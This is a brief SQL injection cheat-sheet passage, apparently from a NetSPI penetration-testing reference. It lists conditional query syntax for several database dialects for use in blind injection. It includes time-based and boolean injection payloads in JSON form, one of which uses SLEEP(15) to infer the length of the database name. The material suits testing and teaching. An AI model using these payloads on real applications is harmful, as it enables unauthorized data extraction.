Conditionals
Conditional statements are beneficial for creating complex queries and aiding in Blind Injection.
| Description | Query |
|---|---|
| If/Else | SELECT IF(1=2,'true','false') |
| If/Else (json) | {"id"="xxx AND IF(length(database())=’1’, SLEEP(15),1)#”} If the database name's length is 1, database gets unresponsive with given miliseconds |
| Logical OR | SELECT 1 || 0 To see nuances of this operator go here |
| AND (json) | {"id"="xxx AND 1=1#"} True statement {"id"="xxx AND 1=2#"} False statement |
Conditionals
Conditional statements are beneficial for creating complex queries and aiding in Blind Injection.
| Description | Query |
|---|---|
| Case | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual |
Conditionals
Conditional statements are beneficial for creating complex queries and aiding in Blind Injection.
| Description | Query |
|---|---|
| Case | SELECT * FROM CASE WHEN 1=1 THEN 1 ELSE 0 END |
| If/Else | IF 1=2 SELECT 'true' ELSE SELECT 'false'; |
© 2024 Copyright by NetSPI. All rights reserved.